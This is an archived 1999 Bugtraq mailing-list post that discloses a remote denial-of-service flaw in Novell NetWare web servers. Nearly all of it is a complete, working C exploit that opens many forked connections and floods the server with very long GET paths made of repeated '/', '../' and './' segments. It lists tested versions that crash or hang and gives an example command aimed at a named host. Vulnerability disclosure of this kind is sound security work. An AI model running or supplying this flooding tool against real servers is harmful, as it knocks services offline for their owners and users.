[10831] in bugtraq
Novell NetWare webservers DoS
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Jun 16 14:38:47 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <19990616155836.9888.qmail@venglin.gadaczka.dhs.org>
Date: Wed, 16 Jun 1999 17:58:36 +0200
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
To: BUGTRAQ@NETSPACE.ORG
Sorry, if it already has been published:
/******************************************************************************
Novell NetWare webservers remote denial of service
<venglin@lagoon.freebsd.org.pl>
*******************************************************************************
Tested on:
- Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
Webserver stops responding requests for few minutes.
- Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
Whole system crash [page fault?].
- Novell NetWare ?.? with YAWN/1.05 (crc:E8B0):
Webserver crash.
- Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0):
No problems.
- Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0):
No problems.
*******************************************************************************
Usage:
./www <vulnerable_host> <http_port> <how_many_connections> <string_length>
Example:
./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"
long getip(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
perror("gethostbyname");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;
if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]); exit(0); }
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));
len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); }
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
exit(0);
}
waitpid(x,&i,0);
exit(0);
}
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
